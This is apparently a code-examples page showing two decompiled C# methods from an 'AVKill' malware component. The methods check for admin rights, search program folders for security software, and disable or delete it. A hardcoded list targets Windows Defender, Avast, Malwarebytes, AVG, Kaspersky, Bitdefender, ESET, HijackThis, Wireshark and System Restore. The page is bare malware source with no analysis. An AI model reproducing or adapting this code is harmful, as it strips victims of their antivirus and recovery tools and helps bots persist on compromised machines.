Exemple #1
0
        // Token: 0x0600004E RID: 78 RVA: 0x00005508 File Offset: 0x00003708
        public static bool CheckProcess(string location)
        {
            bool result;

            try
            {
                string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary);
                string   text  = Strings.StrConv(location.ToString(), VbStrConv.Lowercase, 0);
                foreach (string value in array)
                {
                    try
                    {
                        if (text.Contains(value))
                        {
                            AVKill.FuckFileName(location.ToString());
                            BotKillers.KillFile(location.ToString());
                            result = true;
                            break;
                        }
                    }
                    catch (Exception ex)
                    {
                    }
                }
            }
            catch (Exception ex2)
            {
            }
            return(result);
        }
Exemple #2
0
 // Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320
 public static void Start()
 {
     try
     {
         if (!AntiEverything.IsAdmin())
         {
             CheckAV.RunAVAdminMode();
         }
         else
         {
             AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA"));
             AVKill.ProtectMyFile();
             AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
             AVKill.AVProcSearcher();
             AVKill.FuckFileName("rstrui.exe");
             AVKill.FuckFileName("AvastSvc.exe");
             AVKill.FuckFileName("avconfig.exe");
             AVKill.FuckFileName("AvastUI.exe");
             AVKill.FuckFileName("avscan.exe");
             AVKill.FuckFileName("instup.exe");
             AVKill.FuckFileName("mbam.exe");
             AVKill.FuckFileName("mbamgui.exe");
             AVKill.FuckFileName("mbampt.exe");
             AVKill.FuckFileName("mbamscheduler.exe");
             AVKill.FuckFileName("mbamservice.exe");
             AVKill.FuckFileName("hijackthis.exe");
             AVKill.FuckFileName("spybotsd.exe");
             AVKill.FuckFileName("ccuac.exe");
             AVKill.FuckFileName("avcenter.exe");
             AVKill.FuckFileName("avguard.exe");
             AVKill.FuckFileName("avgnt.exe");
             AVKill.FuckFileName("avgui.exe");
             AVKill.FuckFileName("avgcsrvx.exe");
             AVKill.FuckFileName("avgidsagent.exe");
             AVKill.FuckFileName("avgrsx.exe");
             AVKill.FuckFileName("avgwdsvc.exe");
             AVKill.FuckFileName("egui.exe");
             AVKill.FuckFileName("zlclient.exe");
             AVKill.FuckFileName("bdagent.exe");
             AVKill.FuckFileName("keyscrambler.exe");
             AVKill.FuckFileName("avp.exe");
             AVKill.FuckFileName("wireshark.exe");
             AVKill.FuckFileName("ComboFix.exe");
             AVKill.FuckFileName("MSASCui.exe");
             AVKill.FuckFileName("MpCmdRun.exe");
             AVKill.FuckFileName("msseces.exe");
             AVKill.FuckFileName("MsMpEng.exe");
             AVKill.FuckFileName("blindman.exe");
             AVKill.FuckFileName("SDFiles.exe");
             AVKill.FuckFileName("SDMain.exe");
             AVKill.FuckFileName("SDWinSec.exe");
         }
     }
     catch (Exception ex)
     {
     }
 }